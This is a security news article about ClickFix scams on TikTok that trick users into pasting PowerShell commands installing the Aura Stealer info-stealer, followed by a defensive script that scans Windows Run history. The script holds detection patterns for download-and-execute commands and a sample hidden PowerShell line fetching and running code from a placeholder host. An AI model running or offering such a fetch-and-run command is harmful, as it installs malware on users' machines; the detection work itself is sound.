- TikTok videos trick users into executing malicious commands disguised as software activators
- Aura Stealer malware steals passwords, cookies and crypto wallet data from infected systems
- Avoid suspicious links, use official software and keep security tools fully up to date
The dreaded ClickFix malware attacks are now targeting TikTok users, tricking them into installing info-stealers and losing sensitive files, access to accounts and possibly even money.
Security researchers, including Trend Micro, Xavier Mertens and others, have reported seeing several TikTok videos offering instructions on how to “activate” popular software such as Windows, Microsoft 365, Adobe Premiere and others. In some cases, the videos show viewers how to activate product bundles that don’t even exist, such as for Netflix or Spotify.
“Activation” is the usual ClickFix trick: users are prompted to copy and paste a command into Windows Run that, in reality, is a malicious PowerShell command that deploys and runs Aura Stealer.
How to stay safe
Aura Stealer is an information-stealing malware that scrapes passwords stored in browsers, authentication cookies, cryptocurrency wallet data, and credentials from other applications. Xavier Mertens added that the ClickFix code also downloads additional malware, the purpose of which is unclear at the moment.
As a scam technique, ClickFix has been around for decades. It works by tricking people into thinking they have a problem with their computer, then offering a quick and easy solution.
It all started with browser pop-ups in the early 2000s, when the scam revolved around fake virus notifications. More recently, ClickFix has evolved and now deceives people with fake “locked” documents, exclusive offers, software activators, etc.
To stay safe, be skeptical of random links or buttons in emails or websites, especially those that ask you for urgent fixes or updates. Always visit official websites and use legitimate software. Additionally, make sure your browser, operating system, and security software are up to date and use a reliable ad blocker (if possible).
Finally, be careful when granting permissions to websites or apps. If something seems suspicious or too convenient, close the page and check it first.
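For defenders checking whether someone followed such a video, Windows keeps a history of Run dialog commands in the current user's RunMRU registry key. The PowerShell below is an added example, not code from the article or the researchers it cites: it reads that history and flags entries that look like pasted PowerShell download-and-run one-liners. The indicator patterns, function names and sample commands are assumptions made for illustration, not indicators from the reported campaign.

```powershell
# Added example: triage Windows Run dialog history for ClickFix-style commands.
# Patterns are illustrative heuristics (assumed), not IoCs from the report.
$RunMruPath = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'

# Label -> regex (PowerShell -match is case-insensitive by default).
$Indicators = [ordered]@{
    'launches PowerShell'      = '\b(powershell|pwsh)(\.exe)?\b'
    'fetches remote content'   = '\b(iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile)\b|https?://'
    'executes fetched text'    = '\b(iex|Invoke-Expression)\b'
    'hidden or encoded launch' = '-(w|win|windowstyle)\s+h|-(e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}'
}

function Test-RunCommand {
    param([Parameter(Mandatory)][string]$Command)
    $hits = @(foreach ($name in $Indicators.Keys) {
        if ($Command -match $Indicators[$name]) { $name }
    })
    [pscustomobject]@{
        Command    = $Command
        Indicators = $hits -join '; '
        # Flag only PowerShell launches that show at least one further indicator.
        Suspicious = ($hits -contains 'launches PowerShell') -and ($hits.Count -ge 2)
    }
}

function Get-RunDialogHistory {
    if (-not (Test-Path $RunMruPath)) { return }
    $key = Get-ItemProperty -Path $RunMruPath
    # Commands sit under single-letter value names (a, b, c, ...); MRUList holds
    # their order. Each stored command carries a trailing "\1" marker.
    $key.PSObject.Properties |
        Where-Object { $_.Name -match '^[a-z]$' } |
        ForEach-Object { ([string]$_.Value) -replace '\\1$', '' }
}

# Constructed sample input, so the logic can be seen without a real history.
$samples = @(
    'notepad'
    'https://example.invalid/help'
    'powershell -w hidden -c "iex (irm https://example.invalid/activate)"'
)

$samples | ForEach-Object { Test-RunCommand $_ } | Format-Table -AutoSize -Wrap

# Live check for the current user (Windows only).
Get-RunDialogHistory | ForEach-Object { Test-RunCommand $_ } |
    Where-Object Suspicious | Format-List
```

Of the three constructed samples, only the last is flagged. A clean result does not clear a machine, because the Run history is per user and can be cleared.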
Via BleepingComputer